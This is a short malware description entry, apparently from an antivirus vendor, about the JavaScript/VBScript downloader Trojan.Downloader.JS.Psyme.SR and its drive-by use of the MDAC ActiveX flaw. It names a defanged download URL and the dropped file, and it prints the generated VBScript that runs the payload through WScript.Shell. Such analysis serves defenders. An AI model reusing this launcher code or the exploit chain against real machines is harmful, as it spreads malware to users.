Home / malware

PDF

Trojan.Downloader.JS.Psyme.SR

First posted on 21 November 2011.
Source: BitDefender

Aliases :

Trojan.Downloader.JS.Psyme.SR is also known as Exploit.JS.ActiveX.r, Exploit:JS/Mult.AC, Virus, found, JS/Downloader.Agent, Downloader, VBS/TrojanDownloader.Psyme.NFJ.

Explanation :

The Trojan uses obfuscated VBScript code and Javascript to download other malware onto the users' computer.
It is part of a "drive-by exploit chain" which uses known security flaws to infect computers which are not updated. It tries to use a vulnerable Microsoft Data Access component (MDAC) ActiveX object trough its CLSID ( BD96C556-65A3-11D0-983A-00C04FC29E36 ). You can find more here (MS06-014).

Using the mentioned exploit it downloads a file from hxxp://?.weixk.com/new/a1.css which is detected as Rootkit.Agent.AIWN in the %Temp% folder with the name "GameeeEeee.pif". Afterward it generates another VBScript file which has the following content :

'I LOVE gameee TEAM'I LOVE gameee TEAM
Set Love_gameee = CreateObject("Wscript.Shell")'I LOVE gameee TEAM
'I LOVE gomeee TEAM'i LOVE gomeee TEAM
Love_gameee.run ("%Temp%GameeeEeee.pif")
'I LOVE gameee TEAM'I LOVE gameee TEAM

This is done in order to execute the first downloaded file trough the generated VBScript using a "shell" object.

Last update 21 November 2011

 

TOP